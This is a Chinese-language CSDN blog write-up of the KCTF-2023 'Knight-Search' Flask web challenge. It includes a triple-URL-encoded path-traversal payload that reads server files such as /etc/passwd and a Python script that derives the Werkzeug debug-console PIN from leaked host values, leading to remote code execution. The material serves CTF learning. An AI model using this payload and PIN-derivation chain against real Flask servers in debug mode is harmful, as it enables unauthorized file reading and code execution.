KCTF-2023 Knight-Search wp

最新推荐文章于 2023-03-31 20:44:28 发布
最新推荐文章于 2023-03-31 20:44:28 发布
阅读量450 收藏
点赞数
分类专栏: CTF修炼之路 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yink12138/article/details/128773714
版权

首先,分析题目描述,发现是个flask后端,没啥其他信息
进题目,就只有一个输入框,看源码,没啥东西,抓包,发现是个filename参数
​​​​
怎么改都没啥用,于是删除必要参数看看报错
发现出现了debug页面,有关键代码被泄露:

@app.route("/home", methods=['POST'])
def home():
    filename = urllib.parse.unquote(request.form['filename'])
    data = "Try Harder....."
    naughty = "../"
    if naughty not in filename:
        filename = urllib.parse.unquote(filename)
        if os.path.isfile(current_app.root_path + '/'+ filename):

这个路由有逻辑漏洞,检验和实际文件名不一致,差一次url解码,于是三次url编码加路径穿越完成任意文件读(注意request.form也自动解码一次,建议使用https://gchq.github.io/CyberChef/)
示例payload:(读/app/app.py)
%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252Fapp%25252Fapp.py
app.py里面并没有什么有用的东西,/etc/passwd里面有一个看起来就奇怪的用户名(这个得靠经验)yooboi,尝试在/home/yooboi里面读取flag.txt和flag,没有用
读的文件都没了,那就换条路,flask后端搭载了werkzeug工具包,debug模式开启时,可以通过/console路由访问调试控制台执行命令,但是需要PIN。看这篇文章可以找到在LFI(本地文件读)的情况下如何得到PIN码
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug
我这里只给出正确结果和脚本:
username:yooboi
modname:flask.app
getattr(app, ‘__name__’, getattr (app.__ class__, ‘__name__’)):Flask
getattr(mod, ‘__file__’, None):/usr/local/lib/python3.9/site-packages/flask/app.py
str(uuid.getnode()):2485377892355
get_machine_id():e01d426f-826c-4736-9cd2-a96608b66fd8
求PIN脚本:

import hashlib
from itertools import chain
probably_public_bits = [
    'yooboi',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.9/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377892355',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'e01d426f-826c-4736-9cd2-a96608b66fd8'# get_machine_id(), /etc/machine-id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

最终PIN:695-086-043
输入正确PIN后就可以RCE了,最终flag:
flag

yink12138
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
06-shadows-of-the-knight-episode1
03-04
标题“06-shadows-of-the-knight-episode1”似乎暗示了一个系列的第六部分,可能是一个教程或案例研究,涉及编程或技术问题的解决。在IT行业中,这种命名方式经常用于表示一系列的教学视频、文章或者代码示例,尤其...
Hollow Knight: Silksong Search-crx插件
03-14
搜索《空心骑士:丝绸之歌》,获取最新的《空心骑士新闻》! 使用您最喜欢的游戏在网络上搜索:空心骑士丝绸之歌! 通过此搜索扩展,您可以轻松获得最佳搜索,同时在背景中显示最佳的Silksong图像;...
NKCTF2023 web wp
adorkablezhenbai的博客
03-27 1103
web新手签到NKCTF,简单记录两个签到题。
NKCTF2023·Crypto WP(全)
qq_32284207的博客
03-31 1103
NKCTF2023密码全题解
2023 NKCTF --- Crypto ezRSA wp
3tefanie丶zhou的博客
03-28 898
【世间情种偏好伤心事,苦中作乐,乐在其中,不伤心又如何算得上痴情人。】
NKCTF 2023 Writeup By AheadSec
末初的CSDN博客
03-27 2647
NKCTF 2023 Writeup By AheadSec 战队的各位师傅辛苦啦~
NKCTF2023
weixin_73290593的博客
03-27 805
钝角
White-Knight:白色骑士皮带打印机
05-14
White Knight Belt打印机该存储库包含构建您自己的White Knight Belt打印机所需的所有文件。 我相信现在所有文件都已转换为Fusion 360。 如果您发现我错过的文件,请打开新一期,然后将其转换并上传。 有人试图...
Soul Knight Search-crx插件
04-05
用Soul Knight搜索并获得最新的Soul Knight游戏新闻! 使用您最喜欢的游戏在网上搜索:灵魂骑士! 通过此默认搜索扩展程序,您可以轻松访问最佳搜索结果,当您单击工具栏中的图标时,“灵魂骑士”的最新消息! 为了...
NKCTF 2023-misc全解(有脚本,有详解)
路baby的博客
03-29 3455
前几天打了nkctf ,因为自己也是主打misc,顺便也复现一遍,一点自己的拙见,各位师傅见笑了
2023NKCTF Writeup——W4ntY0u.
weixin_52365980的博客
03-27 4095
NKCTF2023是由N0wayBack战队举办。本次比赛采用线上网络安全技能大赛实践赛的形式,覆盖Web、Reverse、Pwn、Misc、Crypto、SocialEngineering等主流赛题方向,面向国内所有个体及团队 除了梦想外我们一无所有,将会和蔑视与困境做最后的斗争,这是最后一舞
NKCTF_WP
m0_73954357的博客
03-27 655
aa
2023 Real World CTF 体验赛 --- wp
3tefanie丶zhou的博客
01-09 846
【他乡纵有当头月,不抵故乡一盏灯,年关将至,外乡人都早些回家】
NKCTF-2023-RE-Baby_rust
qq_54894802的博客
03-31 580
简单的rust逆向
NKCTF-2023-RE-not_a_like
qq_54894802的博客
03-31 524
UPX头缺失,PY解包,RSA维纳攻击,RC4,base64
NKCTF2023 Crypto 部分wp
qq_41626232的博客
03-27 929
--------------------------------------------------------------------------------------------------------------------------------补一下这个格。泄露低444位,高位不知道泄露多少,但是flag总不会有 1024-444 位吧,只需高位570-444=126位就可以计算出中间的,跟常规的p低位泄露其实差不多。不知道这有啥问题,但是把-符号给replace了?
[NKCTF2023]web/misc/Social Engineering-WP
qq_43328446的博客
03-27 1321
nkctf2023
CTFshow_年CTF 2023
weixin_45908624的博客
01-28 774
_年CTF
[NKCTF2023]web/misc/blockchain-wp
qq_63923205的博客
03-27 1077
NKCTF WP
ZOJ-1091-Knight Moves
最新发布
06-02
这是一个IT类问题,该问题是一个经典的图论问题,需要计算从一个棋盘上某个起点到达另一个点的最短路径。在这个问题中,棋盘上的每个格子都可以看做是图中的一个节点,而马可以看做是从一个节点到达另一个节点的一条边。因此,可以使用广度优先搜索算法来解决这个问题。具体步骤如下: 1. 将起点加入队列; 2. 对队列中的节点进行循环,对于每个节点,分别计算所有可能的下一步走法,并将其加入队列; 3. 如果目标节点被加入队列,则返回到达目标节点的步数; 4. 如果队列为空,则表示无法到达目标节点,返回 -1。 在具体实现时,可以使用一个二维数组来表示棋盘,使用一个队列来保存待处理的节点,使用一个二维数组来记录每个节点被访问的次数,以避免重复访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值